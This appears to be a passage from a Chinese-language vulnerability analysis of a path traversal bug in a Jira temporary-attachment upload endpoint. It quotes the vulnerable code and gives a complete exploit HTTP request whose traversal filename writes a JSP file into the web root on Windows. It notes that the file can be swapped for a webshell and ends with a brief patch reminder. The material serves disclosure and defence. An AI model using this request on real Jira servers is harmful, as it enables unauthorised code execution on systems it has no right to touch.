在第31行,代码将上传的文件移动到一个临时目录中,filename的值没有任何过滤,该值由多个部分组合而成,因此可以通过客户端控制。
31 tempAttachmentFile = new File(tmpDir, uniqueId + "_" +
fileName);
来源:
13 [...]createTemporaryAttachment(filePart.getName(),
filePart.getContentType(), filePart.getInputStream());
漏洞利用
为了使文件上传到附件目录之外,可以用一个经典的目录遍历模式遍历到公共web目录的根目录(/atlassian-jira/)。在之前示例代码可以看到其并没有对文件内容进行过滤,因此可以上传一个JSP shell来获取系统权限。
POST /rest/collectors/1.0/tempattachment/multipart/2c1ce5fa HTTP/1.1 Host: hackme.atlassian.net Cookie: atlassian.xsrf.token=BQ79-A85Q-7DOM-UMFN|e98231aaaef98a0d9dc7c52e87f4e84cf9cd3085 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------16266315542468 Content-Length: 345 -----------------------------16266315542468 Content-Disposition: form-data; name="screenshot"; filename="/../../../atlassian-jira/hello.jsp" Content-Type: text/plain <h1> Hello world!</h1> -----------------------------16266315542468 |
请求中的文件名"/../../../atlassian-jira/hello.jsp"会被连结到uniqueid从而代替临时目录路径。
在Windows系统上:
C:\Program
Files\Atlassian\Application
Data\JIRA\caches\tmp_attachments\6177763437089900999_/../../../atlassian-jira/hello.jsp
在Linux系统上:
/opt/atlassian/jira/caches/tmp_attachments/6177763437089900999_/../../../atlassian-jira/hello.jsp
在windows系统上路径会被规范化为"C:\Program
Files\Atlassian\Application Data\JIRA\atlassian-jira\hello.jsp",之后文件被写入。换句话说,Linux系统会使用整个完整的路径,并会发现目录"/opt/atlassian/jira/caches/tmp_attachments/6177763437089900999_"根据不存在,因此无法利用。
这里可以将上传的文件替换为一个webshell。
漏洞修补
如果读者维护着一款Jira实例,应该已经接收到更新提示了,如果没有,请参考文章开头提到的公告。
